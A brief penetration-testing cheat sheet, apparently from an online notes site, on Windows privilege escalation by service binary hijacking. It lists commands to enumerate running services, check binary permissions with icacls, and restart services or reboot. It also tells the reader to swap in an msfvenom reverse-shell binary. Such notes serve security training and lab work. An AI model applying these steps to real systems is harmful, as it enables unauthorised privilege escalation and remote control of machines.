Service Binary Hijacking
To get a list of installed windows services:
services.msc(GUI)Get-ServiceorGet-CimInstanceWinpeas or SharpUp (Automated)
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}Check for paths here and any unusual paths should be given extra attention.
Using icacls:
icacls "C:\xampp\apache\bin\httpd.exe"This will give us the permission we have over the service binary.
Replace the binary with msfvenom reverse shell.
Try to restart the service:
net stop mysql
net start mysqlor
sc.exe stop auditTracker
sc.exe start auditTrackerShutdown Privileges
We could reboot the machine if automatic startup:
Check if the auto start is enabled
Check if we have SeShutdown Privileges using whoami /priv
Now to reboot:
Last updated
Was this helpful?